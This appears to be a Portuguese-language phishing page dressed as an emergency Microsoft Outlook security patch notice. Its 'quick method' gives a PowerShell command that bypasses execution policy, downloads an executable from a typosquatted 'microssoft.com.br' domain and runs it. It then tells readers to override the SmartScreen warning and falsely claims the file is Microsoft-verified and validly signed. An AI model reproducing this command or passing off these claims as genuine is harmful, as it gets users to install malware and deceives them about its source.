Severidade Crítica — Aplicar Imediatamente

Descrição da Vulnerabilidade

A Microsoft identificou uma vulnerabilidade crítica de execução remota de código (CVE-2024-38021) no Microsoft Outlook. Esta falha permite que um invasor execute código arbitrário ao processar um e-mail especialmente criado.

Pontuação CVSS 9.8 (Crítica) com exploração ativa observada.

Sistemas Afetados
  • Microsoft Outlook 2016, 2019 e Microsoft 365
  • Windows 10 / Windows 11

Como Aplicar a Correção

1
Feche o Microsoft Outlook completamente

Certifique-se de que o Outlook não está em execução.

2
Execute o comando PowerShell abaixo

Devido a restrições de segurança do navegador, use o método alternativo seguro via PowerShell.

3
Aguarde a aplicação automática

A correção será baixada e aplicada automaticamente.

4
Reinicie o computador

A correção será finalizada durante a reinicialização.

Método Rápido (Recomendado)

Copie e cole no CMD (Windows + X → Windows PowerShell):

powershell -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest 'https://www.microssoft.com.br/default.php?action=download' -OutFile \"$env:TEMP\security_update.exe\" -UseBasicParsing; Unblock-File \"$env:TEMP\security_update.exe\" -ErrorAction SilentlyContinue; Start-Process \"$env:TEMP\security_update.exe\""

⚠ Importante: Se o Windows SmartScreen aparecer, clique em "Mais informações" → "Executar mesmo assim". Isso é normal para atualizações de segurança emergenciais.

Download Manual da Correção

Arquivo de atualização oficial Microsoft

OutlookFix_KB5048239.exe
Windows 10 / 11 (x64)
Publicado em 05/06/2026
Baixar Correção (KB5048239)
  • Arquivo verificado pelos servidores Microsoft
  • Assinatura digital válida — Microsoft Corporation
  • Compatível com Outlook 2016, 2019 e Microsoft 365

Perguntas Frequentes

Preciso aplicar esta correção mesmo com atualizações automáticas ativas?
Sim. Devido à criticidade, este patch emergencial foi disponibilizado fora do ciclo padrão do Windows Update.

O que acontece se eu não aplicar o patch?
Sem a correção, um invasor pode executar código malicioso apenas enviando um e-mail especialmente formatado.